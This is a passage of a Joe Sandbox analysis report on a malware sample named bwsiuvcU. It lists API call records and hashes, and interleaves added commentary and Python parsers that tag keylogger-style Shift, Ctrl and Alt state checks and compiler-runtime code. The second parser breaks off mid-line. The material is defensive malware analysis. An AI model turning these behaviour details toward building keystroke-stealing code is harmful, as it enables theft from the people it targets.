                                                                                                                            • Instruction Fuzzy Hash: 67E09A313502148FD744EBBCE8089A97BE9EF4922130580A5F60ECB361EE21DC00CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b0cf96c16c30ec9d19e1d1192e3a22083537b102fc9b5573d6e5d95817f83d19
                                                                                                                            • Instruction ID: b0cf8452cc7848e09b6a0a23bd1667aa97fd5b014bf114a1f838cbeecb600bce
                                                                                                                            • Opcode Fuzzy Hash: b0cf96c16c30ec9d19e1d1192e3a22083537b102fc9b5573d6e5d95817f83d19
                                                                                                                            • Instruction Fuzzy Hash: C6E0D8717442004FE394ABB8D5486793BE5BF082117018195E60DDB261EF34CC01C715
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.1639938993.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000002.1639938993.000000000044B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                            • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                            • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                            • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetKeyState.USER32(00000010), ref: 41D67A55
                                                                                                                            • GetKeyState.USER32(00000011), ref: 41D67A9A
                                                                                                                            • GetKeyState.USER32(00000012), ref: 41D67ADF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1649606143-0
                                                                                                                            • Opcode ID: 1ebfba9928a6471fa667b7a867935e80e316a588997bd41c7b472bc88aa0ba01
                                                                                                                            • Instruction ID: b61230c2dec6838a87a046b14914864a1290fcf92552f19e3a5c396b0899c392
                                                                                                                            • Opcode Fuzzy Hash: 1ebfba9928a6471fa667b7a867935e80e316a588997bd41c7b472bc88aa0ba01
                                                                                                                            • Instruction Fuzzy Hash: EA315CB5C0074A8FEB21DF9AC5453DFBFF8AB04315F21845AD599A7240C3B89645CFA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetKeyState.USER32(00000010), ref: 41D67A55
                                                                                                                            • GetKeyState.USER32(00000011), ref: 41D67A9A
                                                                                                                            • GetKeyState.USER32(00000012), ref: 41D67ADF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1649606143-0
                                                                                                                            • Opcode ID: 5b2462859de10a362f3c8b9463aac6f26be4daa9ac3fc9c9d09b36e3c9c42b05
                                                                                                                            • Instruction ID: 20ad7da495ad3c2091d46c0d61fd4eaaaa06db61d28abcfc718d44d33974ca61
                                                                                                                            • Opcode Fuzzy Hash: 5b2462859de10a362f3c8b9463aac6f26be4daa9ac3fc9c9d09b36e3c9c42b05
                                                                                                                            • Instruction Fuzzy Hash: 2B319FB0C0074A8FEB10DF9AC54539FBFF8AF04314F21841AD458A7240C3B89645CFA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
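The two kinds of function record above are worth telling apart when reading this report: the sequence IsDebuggerPresent, SetUnhandledExceptionFilter(0), UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess with 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN) on the stack matches the MSVC CRT's stack-cookie failure path (__report_gsfailure / __raise_securityfailure), so the IsDebuggerPresent call there is compiler runtime code rather than bespoke anti-debugging; GetKeyState on 0x10, 0x11 and 0x12 reads the Shift, Ctrl and Alt state, the modifier check a keylogger performs when recording a keystroke, and it lives in a region marked "based on PE: false", i.e. memory not backed by a file on disk. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses "APIs" records in the textual layout shown on this page (the regexes are an assumption about that layout) and tags each record with these two patterns plus the unbacked-memory flag. The sample input is a constructed string copied from the records above.

```python
"""Tag Joe Sandbox function records by the Win32 API sequence they call.

Added example; the record layout (bullet lines "Name.MODULE(args), ref: ADDR"
followed by a "Source File: ... Offset: X, based on PE: true|false" line) is
assumed from the report text, not from any documented Joe Sandbox format.
"""
import re
from typing import Dict, List

# Constructed sample: three "APIs" records copied from the report above.
SAMPLE_RECORDS = """\
APIs
• IsDebuggerPresent.KERNEL32 ref: 004136F4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
• UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
• GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
• TerminateProcess.KERNEL32(00000000), ref: 00413737
Memory Dump Source
• Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• GetKeyState.USER32(00000010), ref: 41D67A55
• GetKeyState.USER32(00000011), ref: 41D67A9A
• GetKeyState.USER32(00000012), ref: 41D67ADF
Memory Dump Source
• Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
APIs
• GetProcessHeap.KERNEL32 ref: 0040ADD0
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
Memory Dump Source
• Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
"""

# "• GetKeyState.USER32(00000010), ref: 41D67A55"; the argument list is optional.
API_LINE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SOURCE_LINE = re.compile(
    r"^•\s*Source File:.*?Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

VK_MODIFIERS = {"10", "11", "12"}          # VK_SHIFT, VK_CONTROL, VK_MENU (Alt)
STATUS_STACK_BUFFER_OVERRUN = "C0000409"   # exit code used by the CRT /GS failure path
GS_FAILURE_APIS = {"SetUnhandledExceptionFilter", "UnhandledExceptionFilter", "TerminateProcess"}


def parse_records(text: str) -> List[Dict]:
    """Split report text into records: one per 'APIs' header, with its dump source."""
    records: List[Dict] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()                  # the report is heavily indented
        if line == "APIs":
            current = {"apis": [], "offset": None, "based_on_pe": None}
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            current["apis"].append({"name": m.group("name"), "module": m.group("module"),
                                    "args": args, "ref": m.group("ref")})
            continue
        m = SOURCE_LINE.match(line)
        if m:
            current["offset"] = m.group("offset")
            current["based_on_pe"] = m.group("pe") == "true"
    return records


def classify(record: Dict) -> List[str]:
    """Return pattern tags for one record."""
    names = {a["name"] for a in record["apis"]}
    all_args = [arg.upper() for a in record["apis"] for arg in a["args"]]
    tags: List[str] = []
    # CRT stack-cookie failure handler: IsDebuggerPresent here is runtime code, not anti-debug.
    if GS_FAILURE_APIS <= names and STATUS_STACK_BUFFER_OVERRUN in all_args:
        tags.append("crt_gs_failure_handler")
    # Two or more GetKeyState calls on Shift/Ctrl/Alt: keystroke-recording modifier probe.
    probes = [a for a in record["apis"]
              if a["name"] == "GetKeyState" and a["args"] and a["args"][0].lstrip("0") in VK_MODIFIERS]
    if len(probes) >= 2:
        tags.append("keylogger_modifier_state_probe")
    # Code in a region not backed by a PE on disk: unpacked or injected payload.
    if record["based_on_pe"] is False:
        tags.append("unbacked_memory")
    return tags or ["unclassified"]


def analyse(text: str) -> List[Dict]:
    """Parse and tag every record; returns offset, API names and tags per record."""
    return [{"offset": r["offset"], "apis": [a["name"] for a in r["apis"]], "tags": classify(r)}
            for r in parse_records(text)]


if __name__ == "__main__":
    for rec in analyse(SAMPLE_RECORDS):
        print(rec["offset"], ", ".join(rec["tags"]), "<-", " ".join(rec["apis"]))
```

Run on the whole report text, the tagging separates compiler-runtime functions (which inflate the API count without saying anything about the malware) from the stealer's own code; extend GS_FAILURE_APIS and VK_MODIFIERS with further CRT or keylogger signatures as needed.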

                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.1639938993.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000002.1639938993.000000000044B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3859560861-0
                                                                                                                            • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                            • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                            • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                            • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000002.1639938993.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000002.1639938993.000000000044B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                            • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                            • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                            • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                            • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,3BE91980), ref: 004170C5
                                                                                                                            • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                            • _malloc.LIBCMT ref: 0041718A
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                            • _malloc.LIBCMT ref: 0041724C
                                                                                                                            • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                            • __freea.LIBCMT ref: 004172A4
                                                                                                                            • __freea.LIBCMT ref: 004172AD
                                                                                                                            • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                            • ___convertcp.LIBCMT ref: 00417309
                                                                                                                            • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                            • _malloc.LIBCMT ref: 00417362
                                                                                                                            • _memset.LIBCMT ref: 00417384
                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                            • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                            • __freea.LIBCMT ref: 004173CF
                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3809854901-0
                                                                                                                            • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                            • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                            • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                            • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 004057DE
                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                            • _malloc.LIBCMT ref: 00405842
                                                                                                                            • _malloc.LIBCMT ref: 00405906
                                                                                                                            • _malloc.LIBCMT ref: 00405930
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                            • String ID: 1.2.3
                                                                                                                            • API String ID: 680241177-2310465506
                                                                                                                            • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                            • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                            • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                            • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3886058894-0
                                                                                                                            • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                            • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                            • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                            • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • EntryPoint.BWSIUVCU(80070057), ref: 004017EE
                                                                                                                              • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                                              • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                            • EntryPoint.BWSIUVCU(80070057), ref: 00401800
                                                                                                                            • EntryPoint.BWSIUVCU(80070057), ref: 00401813
                                                                                                                            • __recalloc.LIBCMT ref: 00401828
                                                                                                                            • EntryPoint.BWSIUVCU(8007000E), ref: 00401839
                                                                                                                            • EntryPoint.BWSIUVCU(8007000E), ref: 00401853
                                                                                                                            • _calloc.LIBCMT ref: 00401861
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1721462702-0
                                                                                                                            • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                            • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                            • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                            • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00414744
                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                            • __getptd.LIBCMT ref: 0041475B
                                                                                                                            • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                            • __lock.LIBCMT ref: 00414779
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                            • String ID: @.B
                                                                                                                            • API String ID: 3521780317-470711618
                                                                                                                            • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                            • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                            • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                            • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                            • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                            • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                            • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                            • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2805327698-0
                                                                                                                            • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                            • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                            • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                            • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00413FD8
                                                                                                                              • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                              • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                            • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                            • __lock.LIBCMT ref: 00414008
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                            • InterlockedIncrement.KERNEL32(3BE91720), ref: 00414050
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4271482742-0
                                                                                                                            • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                            • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                            • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                            • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
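The function entries in this report share one text layout: a call-site line reads `• Name.MODULE(args), ref: ADDR`, a nested `• Part of subcall function ADDR: ...` line attributes a call to a callee, and each block names its memory dump with `Source File: ..., Offset: ..., based on PE: ...`. The parser below is added here as an example; it is not Joe Sandbox code and not code from the analysed sample. It turns such blocks into records and derives the two things a practitioner usually wants from them: the OS APIs the function actually reaches (with the statically linked CRT's LIBCMT entries and the image's own symbols filtered out) and any HRESULT failure codes passed as arguments, such as the 80070057 and 8007000E values at the EntryPoint calls above. The regexes, the field names, the SAMPLE text, the treatment of BWSIUVCU as the dumped image's own module name, and the two-entry HRESULT table are this example's assumptions.

```python
"""Structured parsing of Joe Sandbox "APIs" listings (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the report's own layout; argument lists are shortened.
# "BWSIUVCU" is assumed to be the dumped image's own module name.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E), ref: 0040B8C4
• EntryPoint.BWSIUVCU(80070057), ref: 004017EE
Memory Dump Source
• Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
"""

# One call-site line: optional "Part of subcall function ADDR:" prefix, then
# Name.MODULE, an optional "(arg,arg,...)" list and the "ref: ADDR" call site.
API_RE = re.compile(
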